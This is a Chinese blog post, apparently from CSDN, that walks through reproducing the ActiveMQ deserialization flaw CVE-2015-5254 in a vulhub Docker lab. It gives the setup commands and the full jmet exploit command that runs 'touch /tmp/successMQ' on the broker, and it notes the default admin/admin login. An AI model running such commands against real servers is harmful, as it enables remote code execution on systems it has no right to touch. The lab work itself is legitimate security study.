Apache ActiveMQ序列化漏洞复现(CVE-2015-5254)

最新推荐文章于 2023-04-14 16:52:58 发布
最新推荐文章于 2023-04-14 16:52:58 发布
阅读量167 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wendy_lwn/article/details/108678348
版权

Apache ActiveMQ序列化漏洞(CVE-2015-5254)

1.环境搭建

1.1 下载vulhub

使用vulhub进行环境搭建,具体步骤可参考这里

1.1 启动环境

   cd /vulhub/activemq/CVE-2015-5254
   docker-compose up -d

启动漏洞环境

通过本机IP:8161即可访问
访问IP:8161

2.漏洞复现

2.1 下载EXP

下载地址:https://github.com/matthiaskaiser/jmet
下载可以使用maven打成jar包或者从其他地方地址下载jar包
使用mvn将下载后的源码打成jar包

2.2 执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch  /tmp/successMQ" -Yp ROME  192.168.120.159  61616

在这里插入图片描述
执行之后登录activeMQ管理页面(admin/admin登录)
使用admin/admin登录

查看添加的队列中的信息:
http://192.168.120.159:8161/admin/browse.jsp?JMSDestination=event,
查看事件,可以看到刚刚的事件,点击查看
点击事件

查看事件,触发漏洞:

即可触发命令查看tmp目录下是否写入successMQ
在这里插入图片描述

DaWan_Lv
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ序列漏洞CVE-2015-5254)利用工具
08-15
ActiveMQ序列漏洞CVE-2015-5254)利用工具,ActiveMQ漏洞,反序列漏洞CVE-2015-5254,利用工具,工具
Apache ActiveMQ 远程代码执行漏洞(CNVD-2023-69477)
最新发布
huangyongkang666的博客
10-31 4252
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞,记录一下。
ActiveMQ 任意文件写入漏洞CVE-2016-3088)
qq_40708881的博客
12-12 2457
ActiveMQ 任意文件写入漏洞CVE-2016-3088) 导语 ActiveMQ的web控制台分三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口。admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺
【CVE】CVE-2015-5254:ActiveMQ序列漏洞利用
边扯边淡
03-15 1801
起序:不难,就是需要好好的准备好靶场环境。 一、靶场环境 使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub:https://github.com/vulhub/vulhub 1、漏洞:反序列漏洞漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .
【vulhub漏洞CVE-2015-5254 ActiveMQ序列漏洞
RexHa的博客
02-26 1770
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ序列漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ序列漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQApache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
apache-activemq-5.16.0.zip
09-11
apache-activemq-5.16.0.zip
apache-activemq-5.15.12-bin.zip
03-26
ActiveMQ是一种开源的基于JMS(Java Message Servie)规范的一种消息中间件的实
ActiveMQ序列漏洞CVE-2015-5254
Cwillchris的博客
03-31 7723
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
ActiveMQ序列漏洞CVE-2015-5254)
The code way of kinnisoy
10-24 1957
ActiveMQ序列漏洞CVE-2015-5254)
ActiveMQ序列漏洞 (CVE-2015-5254)
swordheart的博客
01-18 700
漏洞简介 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.x版本之前的5.13.0安全漏洞,该程序造成的漏洞不限制代理中可以序列的类。远程攻击者可以制作一个特殊的序列Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。 漏洞环境 Docker -compose up -d 运行环
01 - vulhub - ActiveMq - CVE-2015-5254
利他者利己,利己者无功。利他利己,利己利他。
09-18 605
漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
ActiveMQ系列漏洞汇总
热门推荐
AaronLuo
06-06 1万+
ActiveMQ序列漏洞CVE-2015-5254) Apache ActiveMQ是美国Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring FrameWork。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 信息搜集 nmap -sS -T5 -n
【vulhub漏洞ActiveMQ序列漏洞 (CVE-2015-5254)-01
书山上的云的博客
01-10 2480
一、漏洞描述 Apache ActiveMQ 是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。 二、漏洞成因 Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列的类。远程攻击者可以制作一个特殊的序列 Java 消息服务 (JMS) ObjectMessage 对象,利用该漏洞执行
ActiveMQ序列漏洞 getshell(CVE-2015-5254)——漏洞
W小哥
11-10 3659
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列的类,远程攻击者可以借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
ActiveMQ序列漏洞(CVE-2015-5254)
oiadkt的博客
04-14 488
ActiveMQ序列漏洞(CVE-2015-5254)
vulhub漏洞——ActiveMQ
weixin_45808483的博客
12-07 721
访问 3128 端口 Goby扫描资产
activemq哪些版本解决了CVE-2022-2048漏洞
06-10
CVE-2022-2048是ActiveMQ的一个安全漏洞,这个漏洞可以允许攻击者通过发送特制的消息来执行任意代码。Apache ActiveMQ从5.15.16开始修了这个漏洞。因此,如果你使用的是Apache ActiveMQ 5.15.16或更高版本,则已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值